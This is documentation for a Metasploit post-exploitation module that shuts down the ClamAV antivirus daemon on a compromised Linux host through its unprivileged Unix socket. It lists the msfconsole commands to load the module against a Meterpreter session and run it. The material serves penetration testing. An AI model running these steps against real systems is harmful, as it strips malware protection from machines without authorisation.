Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/post/linux/manage/disable_clamav.md
Views: 11789
Description
This module will cause the ClamAV service to be shutoff on Linux hosts. ClamAV uses a Unix socket that allows non-privileged users to interact with the ClamAV daemon via utilities like "clamscan". However, no additional checks are required to trigger ClamAV's shutdown.
Verification Steps
Shutting off ClamAV
Launch
msfconsole
Get a Meterpreter shell on a Linux host that's also running ClamAV.
Do:
use post/linux/manage/disable_clamav
Do:
set SESSION <session number on the Linux host>
Do:
exploit -j
The daemon should be shutoff.